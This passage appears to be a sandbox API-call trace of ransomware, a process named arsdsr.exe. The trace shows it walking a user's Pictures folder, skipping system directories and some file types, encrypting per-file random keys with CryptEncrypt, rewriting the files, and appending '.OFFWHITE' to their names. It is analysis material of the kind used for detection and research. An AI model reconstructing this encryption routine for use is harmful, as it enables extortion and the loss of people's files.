HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\SSMFTzSnPYwJ.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\ssmftzsnpywj.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0135.640] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=42804) returned 1 [0135.640] GetProcessHeap () returned 0x500000 [0135.640] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.640] GetProcessHeap () returned 0x500000 [0135.640] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.640] GetProcessHeap () returned 0x500000 [0135.640] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.640] GetProcessHeap () returned 0x500000 [0135.640] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.640] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.640] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.640] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.640] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.640] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.640] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.640] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.640] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.641] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295d610*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295d610*=0x100) returned 1 [0135.641] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.641] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.641] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295d60c*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295d60c*=0x100) returned 1 [0135.641] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xa734, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.641] SetLastError (dwErrCode=0x0) [0135.641] WriteFile (in: hFile=0x214, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0135.643] GetLastError () returned 0x0 [0135.643] GetLastError () returned 0x0 [0135.643] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xa834, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.643] WriteFile (in: hFile=0x214, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295d84c*=0x100, lpOverlapped=0x0) returned 1 [0135.643] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0xa934, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.644] WriteFile (in: hFile=0x214, lpBuffer=0x521ee0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x521ee0*, lpNumberOfBytesWritten=0x295d84c*=0x8, lpOverlapped=0x0) returned 1 [0135.644] GetProcessHeap () returned 0x500000 [0135.644] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xa734) returned 0x55b7c0 [0135.644] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.644] ReadFile (in: hFile=0x214, lpBuffer=0x55b7c0, nNumberOfBytesToRead=0xa734, lpNumberOfBytesRead=0x295d840, lpOverlapped=0x0 | out: lpBuffer=0x55b7c0*, lpNumberOfBytesRead=0x295d840*=0xa734, lpOverlapped=0x0) returned 1 [0135.647] SetFilePointerEx (in: hFile=0x214, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.647] WriteFile (in: hFile=0x214, lpBuffer=0x55b7c0*, nNumberOfBytesToWrite=0xa734, lpNumberOfBytesWritten=0x295d84c, lpOverlapped=0x0 | out: lpBuffer=0x55b7c0*, lpNumberOfBytesWritten=0x295d84c*=0xa734, lpOverlapped=0x0) returned 1 [0135.648] GetProcessHeap () returned 0x500000 [0135.648] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55b7c0 | out: hHeap=0x500000) returned 1 [0135.648] CloseHandle (hObject=0x214) returned 1 [0135.651] GetProcessHeap () returned 0x500000 [0135.651] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.651] GetProcessHeap () returned 0x500000 [0135.651] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.651] GetProcessHeap () returned 0x500000 [0135.651] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.651] GetProcessHeap () returned 0x500000 [0135.651] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.651] lstrcpyW (in: lpString1=0x295d638, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\SSMFTzSnPYwJ.gif" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\SSMFTzSnPYwJ.gif") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\SSMFTzSnPYwJ.gif" [0135.651] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\SSMFTzSnPYwJ.gif", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\SSMFTzSnPYwJ.gif.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\SSMFTzSnPYwJ.gif.OFFWHITE" [0135.651] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\SSMFTzSnPYwJ.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\ssmftzsnpywj.gif"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\SSMFTzSnPYwJ.gif.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\ssmftzsnpywj.gif.offwhite")) returned 1 [0135.652] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1282040, ftCreationTime.dwHighDateTime=0x1d5dbb8, ftLastAccessTime.dwLowDateTime=0xa6b0eb80, ftLastAccessTime.dwHighDateTime=0x1d5de9a, ftLastWriteTime.dwLowDateTime=0xa6b0eb80, ftLastWriteTime.dwHighDateTime=0x1d5de9a, nFileSizeHigh=0x0, nFileSizeLow=0xa734, dwReserved0=0x80007e, dwReserved1=0x295e370, cFileName="SSMFTzSnPYwJ.gif", cAlternateFileName="SSMFTZ~1.GIF")) returned 0 [0135.652] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0135.652] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x358c13b0, ftCreationTime.dwHighDateTime=0x1d5dc4e, ftLastAccessTime.dwLowDateTime=0x425c9c80, ftLastAccessTime.dwHighDateTime=0x1d5e195, ftLastWriteTime.dwLowDateTime=0x425c9c80, ftLastWriteTime.dwHighDateTime=0x1d5e195, nFileSizeHigh=0x0, nFileSizeLow=0x8c83, dwReserved0=0x295debc, dwReserved1=0x3a46be10, cFileName="A1qTK9cy1E.bmp", cAlternateFileName="A1QTK9~1.BMP")) returned 1 [0135.652] lstrcmpiW (lpString1="A1qTK9cy1E.bmp", lpString2=".") returned 1 [0135.652] lstrcmpiW (lpString1="A1qTK9cy1E.bmp", lpString2="..") returned 1 [0135.652] lstrcmpiW (lpString1="A1qTK9cy1E.bmp", lpString2="...") returned 1 [0135.652] lstrcmpiW (lpString1="A1qTK9cy1E.bmp", lpString2="windows") returned -1 [0135.652] lstrcmpiW (lpString1="A1qTK9cy1E.bmp", lpString2="$recycle.bin") returned 1 [0135.652] lstrcmpiW (lpString1="A1qTK9cy1E.bmp", lpString2="rsa") returned -1 [0135.652] lstrcmpiW (lpString1="A1qTK9cy1E.bmp", lpString2="ntuser.dat") returned -1 [0135.652] lstrcmpiW (lpString1="A1qTK9cy1E.bmp", lpString2="programdata") returned -1 [0135.653] lstrcmpiW (lpString1="A1qTK9cy1E.bmp", lpString2="appdata") returned -1 [0135.653] lstrcmpiW (lpString1="A1qTK9cy1E.bmp", lpString2="program files") returned -1 [0135.653] lstrcmpiW (lpString1="A1qTK9cy1E.bmp", lpString2="program files (x86)") returned -1 [0135.653] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\" [0135.653] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\", lpString2="A1qTK9cy1E.bmp" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\A1qTK9cy1E.bmp") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\A1qTK9cy1E.bmp" [0135.653] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.653] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.653] PathFindExtensionW (pszPath="A1qTK9cy1E.bmp") returned=".bmp" [0135.653] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0135.653] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0135.653] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0135.653] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0135.653] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0135.653] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0135.653] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0135.653] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0135.653] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0135.653] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0135.653] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0135.653] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0135.653] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0135.653] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0135.653] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0135.653] lstrcmpiW (lpString1="A1qTK9cy1E.bmp", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.653] GetProcessHeap () returned 0x500000 [0135.654] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x521ef0 [0135.654] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\A1qTK9cy1E.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\a1qtk9cy1e.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0135.654] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=35971) returned 1 [0135.654] GetProcessHeap () returned 0x500000 [0135.654] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.654] GetProcessHeap () returned 0x500000 [0135.654] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.654] GetProcessHeap () returned 0x500000 [0135.654] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.654] GetProcessHeap () returned 0x500000 [0135.654] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.654] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.654] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.655] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.655] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.655] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.655] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.655] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.655] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.655] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295dc90*=0x100) returned 1 [0135.655] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.655] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.655] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0135.656] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x8c83, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.656] SetLastError (dwErrCode=0x0) [0135.656] WriteFile (in: hFile=0x21c, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0135.658] GetLastError () returned 0x0 [0135.658] GetLastError () returned 0x0 [0135.658] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x8d83, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.658] WriteFile (in: hFile=0x21c, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0135.658] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x8e83, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.658] WriteFile (in: hFile=0x21c, lpBuffer=0x521ef0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x521ef0*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0135.658] GetProcessHeap () returned 0x500000 [0135.658] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8c83) returned 0x55a7b8 [0135.659] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.659] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x8c83, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x8c83, lpOverlapped=0x0) returned 1 [0135.662] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.662] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x8c83, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x8c83, lpOverlapped=0x0) returned 1 [0135.662] GetProcessHeap () returned 0x500000 [0135.662] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0135.662] CloseHandle (hObject=0x21c) returned 1 [0135.665] GetProcessHeap () returned 0x500000 [0135.665] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.665] GetProcessHeap () returned 0x500000 [0135.665] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.665] GetProcessHeap () returned 0x500000 [0135.665] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.665] GetProcessHeap () returned 0x500000 [0135.665] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.665] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\A1qTK9cy1E.bmp" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\A1qTK9cy1E.bmp") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\A1qTK9cy1E.bmp" [0135.665] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\A1qTK9cy1E.bmp", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\A1qTK9cy1E.bmp.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\A1qTK9cy1E.bmp.OFFWHITE" [0135.665] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\A1qTK9cy1E.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\a1qtk9cy1e.bmp"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\A1qTK9cy1E.bmp.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\a1qtk9cy1e.bmp.offwhite")) returned 1 [0135.666] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d0ce0, ftCreationTime.dwHighDateTime=0x1d5da8f, ftLastAccessTime.dwLowDateTime=0x9dcf9ad0, ftLastAccessTime.dwHighDateTime=0x1d5d9ee, ftLastWriteTime.dwLowDateTime=0x9dcf9ad0, ftLastWriteTime.dwHighDateTime=0x1d5d9ee, nFileSizeHigh=0x0, nFileSizeLow=0x15a73, dwReserved0=0x295debc, dwReserved1=0x3a46be10, cFileName="IQND JDpAIP.bmp", cAlternateFileName="IQNDJD~1.BMP")) returned 1 [0135.666] lstrcmpiW (lpString1="IQND JDpAIP.bmp", lpString2=".") returned 1 [0135.666] lstrcmpiW (lpString1="IQND JDpAIP.bmp", lpString2="..") returned 1 [0135.666] lstrcmpiW (lpString1="IQND JDpAIP.bmp", lpString2="...") returned 1 [0135.666] lstrcmpiW (lpString1="IQND JDpAIP.bmp", lpString2="windows") returned -1 [0135.666] lstrcmpiW (lpString1="IQND JDpAIP.bmp", lpString2="$recycle.bin") returned 1 [0135.666] lstrcmpiW (lpString1="IQND JDpAIP.bmp", lpString2="rsa") returned -1 [0135.666] lstrcmpiW (lpString1="IQND JDpAIP.bmp", lpString2="ntuser.dat") returned -1 [0135.666] lstrcmpiW (lpString1="IQND JDpAIP.bmp", lpString2="programdata") returned -1 [0135.666] lstrcmpiW (lpString1="IQND JDpAIP.bmp", lpString2="appdata") returned 1 [0135.666] lstrcmpiW (lpString1="IQND JDpAIP.bmp", lpString2="program files") returned -1 [0135.666] lstrcmpiW (lpString1="IQND JDpAIP.bmp", lpString2="program files (x86)") returned -1 [0135.666] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\" [0135.666] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\", lpString2="IQND JDpAIP.bmp" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\IQND JDpAIP.bmp") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\IQND JDpAIP.bmp" [0135.666] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.666] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.666] PathFindExtensionW (pszPath="IQND JDpAIP.bmp") returned=".bmp" [0135.666] lstrcmpiW (lpString1=".bmp", lpString2=".exe") returned -1 [0135.667] lstrcmpiW (lpString1=".bmp", lpString2=".log") returned -1 [0135.667] lstrcmpiW (lpString1=".bmp", lpString2=".cab") returned -1 [0135.667] lstrcmpiW (lpString1=".bmp", lpString2=".cmd") returned -1 [0135.667] lstrcmpiW (lpString1=".bmp", lpString2=".com") returned -1 [0135.667] lstrcmpiW (lpString1=".bmp", lpString2=".cpl") returned -1 [0135.667] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0135.667] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0135.667] lstrcmpiW (lpString1=".bmp", lpString2=".url") returned -1 [0135.667] lstrcmpiW (lpString1=".bmp", lpString2=".ttf") returned -1 [0135.667] lstrcmpiW (lpString1=".bmp", lpString2=".mp3") returned -1 [0135.667] lstrcmpiW (lpString1=".bmp", lpString2=".pif") returned -1 [0135.667] lstrcmpiW (lpString1=".bmp", lpString2=".mp4") returned -1 [0135.667] lstrcmpiW (lpString1=".bmp", lpString2=".OFFWHITE") returned -1 [0135.667] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0135.667] lstrcmpiW (lpString1="IQND JDpAIP.bmp", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.667] GetProcessHeap () returned 0x500000 [0135.667] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x521f00 [0135.667] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\IQND JDpAIP.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\iqnd jdpaip.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0135.667] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=88691) returned 1 [0135.668] GetProcessHeap () returned 0x500000 [0135.668] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.668] GetProcessHeap () returned 0x500000 [0135.668] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.668] GetProcessHeap () returned 0x500000 [0135.668] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.668] GetProcessHeap () returned 0x500000 [0135.668] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.668] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.668] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.668] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.668] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.668] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.668] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.668] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.668] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.668] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295dc90*=0x100) returned 1 [0135.668] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.669] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.669] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0135.669] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x15a73, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.669] SetLastError (dwErrCode=0x0) [0135.669] WriteFile (in: hFile=0x21c, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0135.671] GetLastError () returned 0x0 [0135.671] GetLastError () returned 0x0 [0135.671] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x15b73, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.671] WriteFile (in: hFile=0x21c, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0135.671] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x15c73, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 